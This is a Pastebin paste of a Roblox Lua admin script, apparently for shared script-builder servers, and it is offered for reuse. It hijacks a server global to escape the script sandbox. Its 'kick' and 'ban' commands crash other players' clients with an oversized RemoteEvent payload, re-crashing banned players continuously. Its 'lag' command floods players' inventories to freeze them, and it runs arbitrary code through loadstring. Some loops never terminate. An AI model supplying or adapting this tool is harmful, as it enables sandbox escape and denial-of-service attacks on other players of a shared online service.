Advertisement
supreim

Untitled

Jan 27th, 2016
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.66 KB | None | 0 0
  1. --[[
  2. --Commands--
  3. !NOTE! -- PLEASE GO TO LINE 47 AND REPLACE MY NAME WITH YOUR NAME! -- !NOTE!
  4. % = The prefix you have set
  5.  
  6. %console show
  7. %console hide
  8. %muslist
  9. %cmds
  10. %kill plr, me, all
  11. %kick plr, me, all
  12. %ban plr, me, all
  13. %explode plr, me, all
  14. %exe <command>
  15. %console show
  16. %console hide
  17. %ff <plr>
  18. %unff <plr>
  19. %respawn <plr>
  20. %lag <plr>
  21. %removetools <plr>
  22. %music <id> or from musiclist (%muslist)
  23. %pri
  24. %god plr
  25. %ungod plr
  26. --]]
  27.  
  28. wait() -- Do not touch this!
  29. script.Parent=nil
  30. local fenv = getfenv()
  31. i = game:service'InsertService':LoadAssetVersion(519416165) -- Not important
  32. n = i:children()[1]
  33. game:service'Debris':AddItem(i,0) -- You touch any of this crap you die, along with the orb.
  34. n.Parent=workspace
  35. coroutine.yield() -- Meh,
  36. local Environment
  37. pcall(_G.OSC_AddServerSideData,setmetatable({},{__index=function() -- Boring stuff!
  38. Environment=getfenv(2)end}))-- B
  39. _G.OSC_AddServerSideData=nil -- L
  40. game:service'Debris':AddItem(n,0) -- A
  41. Environment.print=fenv.print -- H
  42. Environment.warn=fenv.warn -- H
  43. Environment.error=fenv.error -- H
  44. Environment.owner=fenv.owner -- H
  45. setfenv(1,Environment)
  46.  
  47. local Admins = game.Players.supreim -- In order for this to work you must put your name where mine is!
  48. local Speed = "0.05" -- Set the speed of the orb's rotation. This is recommended.
  49. local Distance = "5" -- This is the distance that the orb has from your characters torso.
  50. local Prefix = "!"
  51. local Players = Game:GetService('Players')
  52. local Banned = {} -- Leave this be!
  53.  
  54. wait()
  55. local folder = Instance.new("Model", game.Lighting)
  56. folder.Name = "sbans"
  57. game:GetService('RunService').Stepped:connect(function()
  58. for i,x in pairs(folder:children()) do
  59. for i,v in pairs(game.Players:children()) do if v.Name==x.Value then
  60. bannnedd1=Instance.new('RemoteEvent',workspace):FireClient(game.Players[x.Value],{string.rep("Getbannedbro?",2e5+5)})
  61. end
  62. end
  63. end
  64. end)
  65.  
  66. game.Players.PlayerAdded:connect(function(player)
  67. Game:GetService('Chat'):Chat(p, player.Name .. " has joined! AccountAge = " .. player.AccountAge .. " | UserID = " .. player.UserId .. " |..!", Enum.ChatColor.Blue)
  68. end)
  69.  
  70. game.Players.ChildRemoved:connect(function(player2)
  71. Game:GetService('Chat'):Chat(p, player2.Name .. " has left! AccountAge = " .. player2.AccountAge .. " | UserID = " .. player2.UserId .. " |..!", Enum.ChatColor.Blue)
  72. end)
  73.  
  74. Admins.Chatted:connect(function(msg)
  75. if msg:lower() == Prefix .. "muslist" then
  76. sg2 = Instance.new("ScreenGui", Admins.PlayerGui)
  77. fm2 = Instance.new("Frame", sg2)
  78. fm2.Position = UDim2.new(0.42,0,0.3,0)
  79. fm2.Size = UDim2.new(0,300,0,400)
  80. fm2.BackgroundColor3 = Color3.new(0,0,0)
  81. fm2.BackgroundTransparency = 0.5
  82. fm2.BorderSizePixel = 0
  83. s1 = Instance.new("TextButton", fm2)
  84. s1.Size = UDim2.new(0,300,0,25)
  85. s1.TextColor3 = Color3.new(255,255,255)
  86. s1.FontSize = 2
  87. s1.Text = "Cake"
  88. s1.BackgroundTransparency = 1
  89. s2 = Instance.new("TextButton", fm2)
  90. s2.Size = UDim2.new(0,300,0,25)
  91. s2.Position = UDim2.new(0,0,0,25)
  92. s2.TextColor3 = Color3.new(255,255,255)
  93. s2.FontSize = 2
  94. s2.Text = "Watcha"
  95. s2.BackgroundTransparency = 1
  96. s3 = Instance.new("TextButton", fm2)
  97. s3.Size = UDim2.new(0,300,0,25)
  98. s3.Position = UDim2.new(0,0,0,50)
  99. s3.TextColor3 = Color3.new(255,255,255)
  100. s3.FontSize = 2
  101. s3.Text = "Moonman"
  102. s3.BackgroundTransparency = 1
  103. s4 = Instance.new("TextButton", fm2)
  104. s4.Size = UDim2.new(0,300,0,25)
  105. s4.Position = UDim2.new(0,0,0,75)
  106. s4.TextColor3 = Color3.new(255,255,255)
  107. s4.FontSize = 2
  108. s4.Text = "Hello"
  109. s4.BackgroundTransparency = 1
  110. s5 = Instance.new("TextButton", fm2)
  111. s5.Size = UDim2.new(0,300,0,25)
  112. s5.Position = UDim2.new(0,0,0,100)
  113. s5.TextColor3 = Color3.new(255,255,255)
  114. s5.FontSize = 2
  115. s5.Text = "Lean"
  116. s5.BackgroundTransparency = 1
  117. s6 = Instance.new("TextButton", fm2)
  118. s6.Size = UDim2.new(0,300,0,25)
  119. s6.Position = UDim2.new(0,0,0,125)
  120. s6.TextColor3 = Color3.new(255,255,255)
  121. s6.FontSize = 2
  122. s6.Text = "Waves"
  123. s6.BackgroundTransparency = 1
  124. s7 = Instance.new("TextButton", fm2)
  125. s7.Size = UDim2.new(0,300,0,25)
  126. s7.Position = UDim2.new(0,0,0,150)
  127. s7.TextColor3 = Color3.new(255,255,255)
  128. s7.FontSize = 2
  129. s7.Text = "Baby"
  130. s7.BackgroundTransparency = 1
  131. close2 = Instance.new("TextButton", fm2)
  132. close2.Size = UDim2.new(0,15,0,15)
  133. close2.Position = UDim2.new(0,285,0,0)
  134. close2.BackgroundTransparency = 1
  135. close2.TextColor3 = Color3.new(255,255,255)
  136. close2.Text = "X"
  137. close2.MouseButton1Click:connect(function()
  138. fm2:Destroy()
  139. sg2:Destroy()
  140. end)
  141. end
  142. end)
  143. Admins.Chatted:connect(function(msg)
  144. if msg:lower() == Prefix .. "cmds" then
  145. local screenGui = Instance.new("ScreenGui")
  146. screenGui.Parent = Admins.PlayerGui
  147.  
  148. local scrollingFrame = Instance.new("ScrollingFrame")
  149. scrollingFrame.Parent = screenGui
  150. scrollingFrame.Position = UDim2.new(0.2, 0, 0.1, 0)
  151. scrollingFrame.Size = UDim2.new(0, 500, 0, 400)
  152. scrollingFrame.CanvasSize = UDim2.new(0, 500, 2, 0)
  153. scrollingFrame.BackgroundColor3 = Color3.new(0,0,0)
  154. scrollingFrame.BorderSizePixel = 2
  155. scrollingFrame.BorderColor3 = Color3.new(170,0,0)
  156.  
  157. local closecmds = Instance.new("TextButton")
  158. closecmds.Parent = screenGui
  159. closecmds.Size = UDim2.new(0,50,0,50)
  160. closecmds.Position = UDim2.new(0.2, 0, 0.02, 0)
  161. closecmds.BackgroundColor3 = Color3.new(0,0,0)
  162. closecmds.Text = "X"
  163. closecmds.TextColor3 = Color3.new(170,0,0)
  164. closecmds.FontSize = 3
  165. closecmds.BorderSizePixel = 2
  166. closecmds.BorderColor3 = Color3.new(170,0,0)
  167. closecmds.MouseButton1Click:connect(function()
  168. screenGui:Destroy()
  169. end)
  170. local cmd1 = Instance.new("TextLabel")
  171. cmd1.Parent = scrollingFrame
  172. cmd1.Position = UDim2.new(0, 0, 0, 0)
  173. cmd1.Size = UDim2.new(0, 500, 0, 25)
  174. cmd1.BackgroundColor3= Color3.new(0,0,0)
  175. cmd1.TextColor3 = Color3.new(170,0,0)
  176. cmd1.FontSize = 5
  177. cmd1.Text = Prefix .. "kill <plr>"
  178. cmd1.ZIndex = 0
  179.  
  180. local cmd2 = Instance.new("TextLabel")
  181. cmd2.Parent = scrollingFrame
  182. cmd2.Position = UDim2.new(0, 0, 0, 25)
  183. cmd2.Size = UDim2.new(0, 500, 0, 25)
  184. cmd2.BackgroundColor3= Color3.new(0,0,0)
  185. cmd2.TextColor3 = Color3.new(170,0,0)
  186. cmd2.FontSize = 5
  187. cmd2.Text = Prefix .. "kick <plr>"
  188. cmd2.ZIndex = 0
  189.  
  190. local cmd3 = Instance.new("TextLabel")
  191. cmd3.Parent = scrollingFrame
  192. cmd3.Position = UDim2.new(0, 0, 0, 50)
  193. cmd3.Size = UDim2.new(0, 500, 0, 25)
  194. cmd3.BackgroundColor3= Color3.new(0,0,0)
  195. cmd3.TextColor3 = Color3.new(170,0,0)
  196. cmd3.FontSize = 5
  197. cmd3.Text = Prefix .. "ban <plr>"
  198. cmd3.ZIndex = 0
  199.  
  200. local cmd4 = Instance.new("TextLabel")
  201. cmd4.Parent = scrollingFrame
  202. cmd4.Position = UDim2.new(0, 0, 0, 75)
  203. cmd4.Size = UDim2.new(0, 500, 0, 25)
  204. cmd4.BackgroundColor3= Color3.new(0,0,0)
  205. cmd4.TextColor3 = Color3.new(170,0,0)
  206. cmd4.FontSize = 5
  207. cmd4.Text = Prefix .. "explode <plr>"
  208. cmd4.ZIndex = 0
  209.  
  210. local cmd5 = Instance.new("TextLabel")
  211. cmd5.Parent = scrollingFrame
  212. cmd5.Position = UDim2.new(0, 0, 0, 100)
  213. cmd5.Size = UDim2.new(0, 500, 0, 25)
  214. cmd5.BackgroundColor3= Color3.new(0,0,0)
  215. cmd5.TextColor3 = Color3.new(170,0,0)
  216. cmd5.FontSize = 5
  217. cmd5.Text = Prefix .. "exe <script>"
  218. cmd5.ZIndex = 0
  219.  
  220. local cmd6 = Instance.new("TextLabel")
  221. cmd6.Parent = scrollingFrame
  222. cmd6.Position = UDim2.new(0, 0, 0, 100)
  223. cmd6.Size = UDim2.new(0, 500, 0, 25)
  224. cmd6.BackgroundColor3= Color3.new(0,0,0)
  225. cmd6.TextColor3 = Color3.new(170,0,0)
  226. cmd6.FontSize = 5
  227. cmd6.Text = Prefix .. "console show"
  228. cmd6.ZIndex = 0
  229.  
  230. local cmd7 = Instance.new("TextLabel")
  231. cmd7.Parent = scrollingFrame
  232. cmd7.Position = UDim2.new(0, 0, 0, 100)
  233. cmd7.Size = UDim2.new(0, 500, 0, 25)
  234. cmd7.BackgroundColor3= Color3.new(0,0,0)
  235. cmd7.TextColor3 = Color3.new(170,0,0)
  236. cmd7.FontSize = 5
  237. cmd7.Text = Prefix .. "console hide"
  238. cmd7.ZIndex = 0
  239.  
  240. local cmd8 = Instance.new("TextLabel")
  241. cmd8.Parent = scrollingFrame
  242. cmd8.Position = UDim2.new(0, 0, 0, 125)
  243. cmd8.Size = UDim2.new(0, 500, 0, 25)
  244. cmd8.BackgroundColor3= Color3.new(0,0,0)
  245. cmd8.TextColor3 = Color3.new(170,0,0)
  246. cmd8.FontSize = 5
  247. cmd8.Text = Prefix .. "ff <plr>"
  248. cmd8.ZIndex = 0
  249.  
  250. local cmd9 = Instance.new("TextLabel")
  251. cmd9.Parent = scrollingFrame
  252. cmd9.Position = UDim2.new(0, 0, 0, 150)
  253. cmd9.Size = UDim2.new(0, 500, 0, 25)
  254. cmd9.BackgroundColor3= Color3.new(0,0,0)
  255. cmd9.TextColor3 = Color3.new(170,0,0)
  256. cmd9.FontSize = 5
  257. cmd9.Text = Prefix .. "unff <plr>"
  258. cmd9.ZIndex = 0
  259.  
  260. local cmd10 = Instance.new("TextLabel")
  261. cmd10.Parent = scrollingFrame
  262. cmd10.Position = UDim2.new(0, 0, 0, 175)
  263. cmd10.Size = UDim2.new(0, 500, 0, 25)
  264. cmd10.BackgroundColor3= Color3.new(0,0,0)
  265. cmd10.TextColor3 = Color3.new(170,0,0)
  266. cmd10.FontSize = 5
  267. cmd10.Text = Prefix .. "respawn <plr>"
  268. cmd10.ZIndex = 0
  269.  
  270. local cmd11 = Instance.new("TextLabel")
  271. cmd11.Parent = scrollingFrame
  272. cmd11.Position = UDim2.new(0, 0, 0, 200)
  273. cmd11.Size = UDim2.new(0, 500, 0, 25)
  274. cmd11.BackgroundColor3= Color3.new(0,0,0)
  275. cmd11.TextColor3 = Color3.new(170,0,0)
  276. cmd11.FontSize = 5
  277. cmd11.Text = Prefix .. "lag <plr>"
  278. cmd11.ZIndex = 0
  279.  
  280. local cmd12 = Instance.new("TextLabel")
  281. cmd12.Parent = scrollingFrame
  282. cmd12.Position = UDim2.new(0, 0, 0, 225)
  283. cmd12.Size = UDim2.new(0, 500, 0, 25)
  284. cmd12.BackgroundColor3= Color3.new(0,0,0)
  285. cmd12.TextColor3 = Color3.new(170,0,0)
  286. cmd12.FontSize = 5
  287. cmd12.Text = Prefix .. "removetools <plr>"
  288. cmd12.ZIndex = 0
  289.  
  290. local cmd13 = Instance.new("TextLabel")
  291. cmd13.Parent = scrollingFrame
  292. cmd13.Position = UDim2.new(0, 0, 0, 250)
  293. cmd13.Size = UDim2.new(0, 500, 0, 25)
  294. cmd13.BackgroundColor3= Color3.new(0,0,0)
  295. cmd13.TextColor3 = Color3.new(170,0,0)
  296. cmd13.FontSize = 5
  297. cmd13.Text = Prefix .. "god <plr>"
  298. cmd13.ZIndex = 0
  299.  
  300. local cmd14 = Instance.new("TextLabel")
  301. cmd14.Parent = scrollingFrame
  302. cmd14.Position = UDim2.new(0, 0, 0, 275)
  303. cmd14.Size = UDim2.new(0, 500, 0, 25)
  304. cmd14.BackgroundColor3= Color3.new(0,0,0)
  305. cmd14.TextColor3 = Color3.new(170,0,0)
  306. cmd14.FontSize = 5
  307. cmd14.Text = Prefix .. "ungod <plr>"
  308. cmd14.ZIndex = 0
  309.  
  310. local cmd15 = Instance.new("TextLabel")
  311. cmd15.Parent = scrollingFrame
  312. cmd15.Position = UDim2.new(0, 0, 0, 300)
  313. cmd15.Size = UDim2.new(0, 500, 0, 25)
  314. cmd15.BackgroundColor3= Color3.new(0,0,0)
  315. cmd15.TextColor3 = Color3.new(170,0,0)
  316. cmd15.FontSize = 5
  317. cmd15.Text = Prefix .. "muslist"
  318. cmd15.ZIndex = 0
  319.  
  320. local cmd16 = Instance.new("TextLabel")
  321. cmd16.Parent = scrollingFrame
  322. cmd16.Position = UDim2.new(0, 0, 0, 325)
  323. cmd16.Size = UDim2.new(0, 500, 0, 25)
  324. cmd16.BackgroundColor3= Color3.new(0,0,0)
  325. cmd16.TextColor3 = Color3.new(170,0,0)
  326. cmd16.FontSize = 5
  327. cmd16.Text = Prefix .. "console show"
  328. cmd16.ZIndex = 0
  329.  
  330. local cmd17 = Instance.new("TextLabel")
  331. cmd17.Parent = scrollingFrame
  332. cmd17.Position = UDim2.new(0, 0, 0, 350)
  333. cmd17.Size = UDim2.new(0, 500, 0, 25)
  334. cmd17.BackgroundColor3= Color3.new(0,0,0)
  335. cmd17.TextColor3 = Color3.new(170,0,0)
  336. cmd17.FontSize = 5
  337. cmd17.Text = Prefix .. "exe <command>"
  338. cmd17.ZIndex = 0
  339.  
  340. local cmd18 = Instance.new("TextLabel")
  341. cmd18.Parent = scrollingFrame
  342. cmd18.Position = UDim2.new(0, 0, 0, 375)
  343. cmd18.Size = UDim2.new(0, 500, 0, 25)
  344. cmd18.BackgroundColor3= Color3.new(0,0,0)
  345. cmd18.TextColor3 = Color3.new(170,0,0)
  346. cmd18.FontSize = 5
  347. cmd18.Text = Prefix .. "music <id> or <song (from muslist)>"
  348. cmd18.ZIndex = 0
  349.  
  350. local cmd19 = Instance.new("TextLabel")
  351. cmd19.Parent = scrollingFrame
  352. cmd19.Position = UDim2.new(0, 0, 0, 375)
  353. cmd19.Size = UDim2.new(0, 500, 0, 25)
  354. cmd19.BackgroundColor3= Color3.new(0,0,0)
  355. cmd19.TextColor3 = Color3.new(170,0,0)
  356. cmd19.FontSize = 5
  357. cmd19.Text = Prefix .. "pri"
  358. cmd19.ZIndex = 0
  359.  
  360. local cmd20 = Instance.new("TextLabel")
  361. cmd20.Parent = scrollingFrame
  362. cmd20.Position = UDim2.new(0, 0, 0, 400)
  363. cmd20.Size = UDim2.new(0, 500, 0, 25)
  364. cmd20.BackgroundColor3= Color3.new(0,0,0)
  365. cmd20.TextColor3 = Color3.new(170,0,0)
  366. cmd20.FontSize = 5
  367. cmd20.Text = Prefix .. "cmds"
  368. cmd20.ZIndex = 0
  369. end
  370. end)
  371.  
  372.  
  373.  
  374. Admins.Chatted:connect(function(msg)
  375. if msg:lower() == Prefix .. "console show" then
  376. sg = Instance.new('ScreenGui', Admins.PlayerGui)
  377. fm = Instance.new('Frame', sg)
  378. fm.Selectable = true
  379. fm.Size = UDim2.new(0,400,0,300)
  380. fm.BackgroundColor3 = Color3.new(0,0,0)
  381. fm.BorderSizePixel = 4
  382. fm.BorderColor3 = Color3.new(255,255,255)
  383. fm.Position = UDim2.new(0.395,0,0.3,0)
  384. txt = Instance.new('TextLabel', fm)
  385. txt.Size = UDim2.new(0,400,0,25)
  386. txt.Text = "~Game Console~"
  387. txt.FontSize = Enum.FontSize.Size18
  388. txt.TextColor3 = Color3.new(255,255,255)
  389. txt.BackgroundColor3 = Color3.new(0,0,0)
  390. txt.BorderSizePixel = 4
  391. txt.BorderColor3 = Color3.new(255,255,255)
  392. box = Instance.new('TextBox', fm)
  393. box.Position = UDim2.new(0,50,0,50)
  394. box.Size = UDim2.new(0,300,0,200)
  395. box.BackgroundColor3 = Color3.new(0,0,0)
  396. box.BorderSizePixel = 4
  397. box.BorderColor3 = Color3.new(255,255,255)
  398. box.TextColor3 = Color3.new(255,255,255)
  399. box.ClearTextOnFocus = false
  400. box.MultiLine = true
  401. box.TextXAlignment = 'Left'
  402. box.TextWrapped = true
  403. box.TextYAlignment = 'Top'
  404. box.Text = 'Click clear to clear the text or remove me by holding backspace!'
  405. load1 = Instance.new('TextButton', box)
  406. load1.Size = UDim2.new(0,200,0,25)
  407. load1.Position = UDim2.new(0,50,0,213)
  408. load1.BackgroundColor3 = Color3.new(0, 170, 0)
  409. load1.TextColor3 = Color3.new(0,0,0)
  410. load1.BorderSizePixel = 4
  411. load1.BorderColor3 = Color3.new(255,255,255)
  412. load1.Text = "Execute!"
  413. load1.MouseButton1Click:connect(function()
  414. loadstring(box.Text)()
  415. end)
  416. clr = Instance.new('TextButton', box)
  417. clr.Size = UDim2.new(0,50,0,25)
  418. clr.Position = UDim2.new(0,275,0,213)
  419. clr.BackgroundColor3 = Color3.new(170,0,0)
  420. clr.TextColor3 = Color3.new(0,0,0)
  421. clr.BorderSizePixel = 4
  422. clr.BorderColor3 = Color3.new(255,255,255)
  423. clr.Text = "Clear!"
  424. clr.MouseButton1Click:connect(function()
  425. box.Text = ''
  426. box:CaptureFocus()
  427. end)
  428. end
  429. end)
  430.  
  431. Admins.Chatted:connect(function(msg)
  432. if msg:lower() == Prefix .. "console hide" then
  433. fm:Destroy()
  434. end
  435. end)
  436.  
  437. Admins.Chatted:connect(function(msg)
  438. if msg:lower():sub(1, 5) == Prefix .. "kill" then
  439. for index, player in pairs(Players:GetPlayers()) do
  440. player.Name:lower():sub(1, #msg:sub(7))
  441. if player.Name:lower():sub(1, #msg:sub(7)) == msg:sub(7):lower() then
  442. pcall(function()
  443. player.Character.Humanoid.Health = 0
  444. end)
  445. end
  446. end
  447. end
  448. end)
  449.  
  450. Admins.Chatted:connect(function(msg)
  451. if msg:lower() == Prefix .. "kill me" then
  452. Admins.Character.Humanoid.Health = 0
  453. end
  454. end)
  455.  
  456. Admins.Chatted:connect(function(msg)
  457. if msg:lower() == Prefix .. "kill all" then
  458. for i,v in pairs(game.Players:children()) do
  459. v.Character.Humanoid.Health = 0
  460. end
  461. end
  462. end)
  463.  
  464.  
  465. Admins.Chatted:connect(function(msg)
  466. if msg:lower():sub(1, 5) == Prefix .. "kick" then
  467. for index, player in pairs(Players:GetPlayers()) do
  468. player.Name:lower():sub(1, #msg:sub(7))
  469. if player.Name:lower():sub(1, #msg:sub(7)) == msg:sub(7):lower() then
  470. pcall(function()
  471. local getrekt=Instance.new('RemoteEvent',workspace):FireClient(player,{string.rep("getkickedbro?",2e5+5)})
  472. end)
  473. end
  474. end
  475. end
  476. end)
  477.  
  478. Admins.Chatted:connect(function(msg)
  479. if msg:lower() == Prefix .. "kick me" then
  480. local getrekt=Instance.new('RemoteEvent',workspace):FireClient(Admins,{string.rep("getkickedbro?",2e5+5)})
  481. end
  482. end)
  483.  
  484. Admins.Chatted:connect(function(msg)
  485. if msg:lower() == Prefix .. "kick all" then
  486. for i,v in pairs(game.Players:children()) do
  487. local getrekt=Instance.new('RemoteEvent',workspace):FireClient(v,{string.rep("getkickedbro?",2e5+5)})
  488. end
  489. end
  490. end)
  491.  
  492.  
  493. Admins.Chatted:connect(function(msg)
  494. if msg:lower():sub(1,4) == Prefix .. "ban" then
  495. for index, player1 in pairs(Players:GetPlayers()) do
  496. player1.Name:lower():sub(1, #msg:sub(6))
  497. if player1.Name:lower():sub(1, #msg:sub(6)) == msg:sub(6):lower() then
  498. pcall(function()
  499. local getrekt=Instance.new('RemoteEvent',workspace):FireClient(player1,{string.rep("getkickedbro?",2e5+5)})
  500. if game.Players:FindFirstChild(player1.Name) then
  501. ban=Instance.new('StringValue',folder)
  502. ban.Name = player1.Name
  503. ban.Value = player1.Name
  504. end
  505. end)
  506. end
  507. end
  508. end
  509. end)
  510.  
  511.  
  512. Admins.Chatted:connect(function(msg)
  513. if msg:lower() == Prefix .. "ban me" then
  514. local getrekt=Instance.new('RemoteEvent',workspace):FireClient(Admins,{string.rep("getkickedbro?",2e5+5)})
  515. if game.Players:FindFirstChild(Admins.Name) then
  516. ban=Instance.new('StringValue',folder)
  517. ban.Name = Admins.Name
  518. ban.Value = Admins.Name
  519. end
  520. end
  521. end)
  522.  
  523. Admins.Chatted:connect(function(msg)
  524. if msg:lower() == Prefix .. "ban all" then
  525. for i,v in pairs(game.Players:children()) do
  526. local getrekt=Instance.new('RemoteEvent',workspace):FireClient(v,{string.rep("getkickedbro?",2e5+5)})
  527. if game.Players:FindFirstChild(v.Name) then
  528. ban=Instance.new('StringValue',folder)
  529. ban.Name = v.Name
  530. ban.Value = v.Name
  531. end
  532. end
  533. end
  534. end)
  535.  
  536.  
  537.  
  538. Admins.Chatted:connect(function(msg)
  539. if msg:lower():sub(1, 8) == Prefix .. "explode" then
  540. for index, player in pairs(Players:GetPlayers()) do
  541. player.Name:lower():sub(1, #msg:sub(10))
  542. if player.Name:lower():sub(1, #msg:sub(10)) == msg:sub(10):lower() then
  543. pcall(function()
  544. ex = Instance.new("Explosion", game.Workspace)
  545. ex.Position = player.Character.Torso.Position
  546. end)
  547. end
  548. end
  549. end
  550. end)
  551.  
  552. Admins.Chatted:connect(function(msg)
  553. if msg:lower() == Prefix .. "explode me" then
  554. ex1 = Instance.new("Explosion", game.Workspace)
  555. ex1.Position = Admins.Character.Torso.Position
  556. end
  557. end)
  558.  
  559. Admins.Chatted:connect(function(msg)
  560. if msg:lower() == Prefix .. "explode all" then
  561. for i,v in pairs(game.Players:children()) do
  562. ex1 = Instance.new("Explosion", game.Workspace)
  563. ex1.Position = v.Character.Torso.Position
  564. end
  565. end
  566. end)
  567.  
  568.  
  569. Admins.Chatted:connect(function(msg)
  570. if msg:lower():sub(1,4) == Prefix .. "exe" then
  571. loadstring(msg:sub(5,#msg))()
  572. end
  573. end)
  574.  
  575.  
  576. Admins.Chatted:connect(function(msg)
  577. if msg:lower():sub(1, 3) == Prefix .. "ff" then
  578. for index, player in pairs(Players:GetPlayers()) do
  579. player.Name:lower():sub(1, #msg:sub(5))
  580. if player.Name:lower():sub(1, #msg:sub(5)) == msg:sub(5):lower() then
  581. pcall(function()
  582. Instance.new("ForceField", player.Character)
  583. end)
  584. else
  585. end
  586. end
  587. end
  588. end)
  589.  
  590.  
  591. Admins.Chatted:connect(function(msg)
  592. if msg:lower():sub(1, 5) == Prefix .. "unff" then
  593. for index, player in pairs(Players:GetPlayers()) do
  594. player.Name:lower():sub(1, #msg:sub(7))
  595. if player.Name:lower():sub(1, #msg:sub(7)) == msg:sub(7):lower() then
  596. pcall(function()
  597. while true do
  598. player.Character.ForceField:Destroy()
  599. end
  600. end)
  601. end
  602. end
  603. end
  604. end)
  605.  
  606.  
  607. Admins.Chatted:connect(function(msg)
  608. if msg:lower() == Prefix .. "ff me" then
  609. Instance.new("ForceField", Admins.Character)
  610. end
  611. end)
  612.  
  613. Admins.Chatted:connect(function(msg)
  614. if msg:lower() == Prefix .. "unff me" then
  615. while true do
  616. Admins.Character.ForceField:Destroy()
  617. end
  618. end
  619. end)
  620.  
  621. Admins.Chatted:connect(function(msg)
  622. if msg:lower() == Prefix .. "ff all" then
  623. for i,v in pairs(game.Players:children()) do
  624. Instance.new("ForceField", v.Character)
  625. end
  626. end
  627. end)
  628.  
  629. Admins.Chatted:connect(function(msg)
  630. if msg:lower() == Prefix .. "unff all" then
  631. for i,v in pairs(game.Players:GetChildren()) do
  632. if v and v.Character then
  633. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  634. end
  635. end
  636. end
  637. end)
  638.  
  639.  
  640.  
  641.  
  642. Admins.Chatted:connect(function(msg)
  643. if msg:lower():sub(1, 4) == Prefix .. "god" then
  644. for index, player in pairs(Players:GetPlayers()) do
  645. player.Name:lower():sub(1, #msg:sub(6))
  646. if player.Name:lower():sub(1, #msg:sub(6)) == msg:sub(6):lower() then
  647. pcall(function()
  648. player.Character.Humanoid.MaxHealth = math.huge
  649. end)
  650. else
  651. end
  652. end
  653. end
  654. end)
  655.  
  656.  
  657. Admins.Chatted:connect(function(msg)
  658. if msg:lower():sub(1, 6) == Prefix .. "ungod" then
  659. for index, player in pairs(Players:GetPlayers()) do
  660. player.Name:lower():sub(1, #msg:sub(8))
  661. if player.Name:lower():sub(1, #msg:sub(8)) == msg:sub(8):lower() then
  662. pcall(function()
  663. player.Character.Humanoid.MaxHealth = 100
  664. end)
  665. end
  666. end
  667. end
  668. end)
  669.  
  670.  
  671. Admins.Chatted:connect(function(msg)
  672. if msg:lower() == Prefix .. "god me" then
  673. Admins.Character.Humanoid.MaxHealth = math.huge
  674. end
  675. end)
  676.  
  677. Admins.Chatted:connect(function(msg)
  678. if msg:lower() == Prefix .. "ungod me" then
  679. while true do
  680. Admins.Character.Humanoid.MaxHealth = 100
  681. end
  682. end
  683. end)
  684.  
  685. Admins.Chatted:connect(function(msg)
  686. if msg:lower() == Prefix .. "god all" then
  687. for i,v in pairs(game.Players:children()) do
  688. v.Character.Humanoid.MaxHealth = math.huge
  689. end
  690. end
  691. end)
  692.  
  693. Admins.Chatted:connect(function(msg)
  694. if msg:lower() == Prefix .. "ungod all" then
  695. for i,v in pairs(game.Players:GetChildren()) do
  696. v.Character.Humanoid.MaxHealth = 100
  697. end
  698. end
  699. end)
  700.  
  701.  
  702.  
  703.  
  704. Admins.Chatted:connect(function(msg)
  705. if msg:lower():sub(1, 8) == Prefix .. "respawn" then
  706. for index, player in pairs(Players:GetPlayers()) do
  707. player.Name:lower():sub(1, #msg:sub(10))
  708. if player.Name:lower():sub(1, #msg:sub(10)) == msg:sub(10):lower() then
  709. pcall(function()
  710. player:LoadCharacter()
  711. end)
  712. end
  713. end
  714. end
  715. end)
  716.  
  717. Admins.Chatted:connect(function(msg)
  718. if msg:lower() == Prefix .. "respawn me" then
  719. Admins:LoadCharacter()
  720. end
  721. end)
  722.  
  723. Admins.Chatted:connect(function(msg)
  724. if msg:lower() == Prefix .. "respawn all" then
  725. for i,v in pairs(game.Players:children()) do
  726. v:LoadCharacter()
  727. end
  728. end
  729. end)
  730.  
  731.  
  732. Admins.Chatted:connect(function(msg)
  733. if msg:lower():sub(1, 4) == Prefix .. "lag" then
  734. for index, player in pairs(Players:GetPlayers()) do
  735. player.Name:lower():sub(1, #msg:sub(6))
  736. if player.Name:lower():sub(1, #msg:sub(6)) == msg:sub(6):lower() then
  737. pcall(function()
  738. for i = 1,10000 do
  739. if player and player:findFirstChild("Backpack") then
  740. local t1 = Instance.new("HopperBin", player.Backpack) t1.Name = "Move" t1.BinType = "GameTool"
  741. local t2 = Instance.new("HopperBin", player.Backpack) t2.Name = "Clone" t2.BinType = "Clone"
  742. local t3 = Instance.new("HopperBin", player.Backpack) t3.Name = "Delete" t3.BinType = "Hammer"
  743. local t4= Instance.new("HopperBin", player.Backpack) t4.Name = "Resize"
  744. end
  745. end
  746. end)
  747. end
  748. end
  749. end
  750. end)
  751.  
  752. Admins.Chatted:connect(function(msg)
  753. if msg:lower() == Prefix .. "lag me" then
  754. for i = 1,1000000 do
  755. if Admins and Admins:findFirstChild("Backpack") then
  756. local t1 = Instance.new("HopperBin", Admins.Backpack) t1.Name = "Move" t1.BinType = "GameTool"
  757. local t2 = Instance.new("HopperBin", Admins.Backpack) t2.Name = "Clone" t2.BinType = "Clone"
  758. local t3 = Instance.new("HopperBin", Admins.Backpack) t3.Name = "Delete" t3.BinType = "Hammer"
  759. local t4= Instance.new("HopperBin", Admins.Backpack) t4.Name = "Resize"
  760. end
  761. end
  762. end
  763. end)
  764.  
  765. Admins.Chatted:connect(function(msg)
  766. if msg:lower() == Prefix .. "lag all" then
  767. for i,v in pairs(game.Players:children()) do
  768. for i = 1,10000 do
  769. if v and v:findFirstChild("Backpack") then
  770. local t1 = Instance.new("HopperBin", v.Backpack) t1.Name = "Move" t1.BinType = "GameTool"
  771. local t2 = Instance.new("HopperBin", v.Backpack) t2.Name = "Clone" t2.BinType = "Clone"
  772. local t3 = Instance.new("HopperBin", v.Backpack) t3.Name = "Delete" t3.BinType = "Hammer"
  773. local t4= Instance.new("HopperBin", v.Backpack) t4.Name = "Resize"
  774. end
  775. end
  776. end
  777. end
  778. end)
  779.  
  780.  
  781. Admins.Chatted:connect(function(msg)
  782. if msg:lower():sub(1, 12) == Prefix .. "removetools" then
  783. for index, player in pairs(Players:GetPlayers()) do
  784. player.Name:lower():sub(1, #msg:sub(14))
  785. if player.Name:lower():sub(1, #msg:sub(14)) == msg:sub(14):lower() then
  786. pcall(function()
  787. if Admins and Admins.Character and Admins:findFirstChild("Backpack") then
  788. for a, tool in pairs(player.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
